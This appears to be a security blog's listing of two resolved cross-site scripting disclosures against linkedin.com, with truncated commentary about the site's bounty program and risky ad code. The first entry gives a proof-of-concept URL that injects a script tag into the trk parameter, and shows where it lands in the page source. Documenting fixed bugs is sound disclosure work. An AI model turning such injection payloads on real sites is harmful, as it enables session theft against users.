Category: linkedin.com

linkedin.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Resolved

Resolved: XSS in the trk parameter of www.linkedin.com as an authenticated user. Reported to security@linkedin.com on June 11, 2013 and resolved today, August 18, 2013.

PoC URL: http://www.linkedin.com/today/?trk=today_home_top_today_control</script><script>alert(1)</script>

MATCH ON: fs.config({"failureRedirect":"http://www.linkedin.com/nhome/","xhrHeaders":{"X-FS-Origin-Request":"/today/?trk=today_home_top_today_control</script><script>alert(1)</script>","X-FS-Page-Id":"pulse-top-news"}});

REQUIRED: Logged In User

XSS in linkedin.com

Commentary: LinkedIn has a Vulnerability Rewards Program which results in sending a T-Shirt, which is ridiculous. Instead, it's suggested that LinkedIn […]

linkedin.com, XSS, Javascript Injection, Ad CDN Code, CWE-79, CAPEC-86, Cross Site Scripting, Resolved

Resolved: XSS in www.linkedin.com. Reported Q2/2012, Resolved Q2/2012.

Thinking about inlining some Ad CDN code in your website? Think again: it's probably a bad move. LinkedIn was foolish enough to inline JavaScript code from the DoubleClick Ad CDN operated by Google. Initially reported to Google in October 2010, XSS in DoubleClick at the time was "Out of […]